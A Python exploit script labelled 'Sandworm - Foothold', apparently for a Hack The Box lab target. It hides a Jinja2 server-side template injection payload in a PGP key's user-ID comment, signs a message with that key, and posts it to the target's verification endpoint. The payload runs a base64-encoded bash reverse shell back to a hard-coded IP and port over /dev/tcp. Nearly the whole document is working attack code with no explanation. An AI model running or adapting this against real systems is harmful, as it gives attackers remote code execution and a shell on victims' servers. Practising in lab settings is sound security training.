Sandworm - Foothold

pgp_ssti.py

#!/usr/bin/env python3
import requests
import pgpy
from pgpy.constants import PubKeyAlgorithm, KeyFlags, HashAlgorithm, SymmetricKeyAlgorithm, CompressionAlgorithm
from urllib3.exceptions import InsecureRequestWarning
import base64

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def createPGPKeysPayload(ssti_payload):
    key = pgpy.PGPKey.new(PubKeyAlgorithm.RSAEncryptOrSign, 4096)
    uid = pgpy.PGPUID.new('xl00t', comment=ssti_payload, email='xl00t@htb.local')

    key.add_uid(uid, usage={KeyFlags.Sign, KeyFlags.EncryptCommunications, KeyFlags.EncryptStorage},
                hashes=[HashAlgorithm.SHA256, HashAlgorithm.SHA384, HashAlgorithm.SHA512, HashAlgorithm.SHA224],
                ciphers=[SymmetricKeyAlgorithm.AES256, SymmetricKeyAlgorithm.AES192, SymmetricKeyAlgorithm.AES128],
                compression=[CompressionAlgorithm.ZLIB, CompressionAlgorithm.BZ2, CompressionAlgorithm.ZIP, CompressionAlgorithm.Uncompressed])

    ct_message = pgpy.PGPMessage.new("useless",
                                 cleartext=True)

    ct_message |= key.sign(ct_message)
    return (ct_message, key.pubkey)

def createRevShell(ip, port):
    b64 = base64.b64encode(f"bash -i >& /dev/tcp/{ip}/{port} 0>&1".encode()).decode()
    return f"echo {b64} | base64 -d | bash"

def main():
    revshell = createRevShell('10.10.14.253', 9001)
    ssti_payload = f"{{{{ self._TemplateReference__context.cycler.__init__.__globals__.os.system('{revshell}') }}}}"

    signed_message, public_key = createPGPKeysPayload(ssti_payload)
    
    payload = {
        "signed_text": str(signed_message),
        "public_key": str(public_key)
    }

    r = requests.post("https://ssa.htb/process", data=payload, verify=False)
    print(r.text)

if __name__ == '__main__':
    main()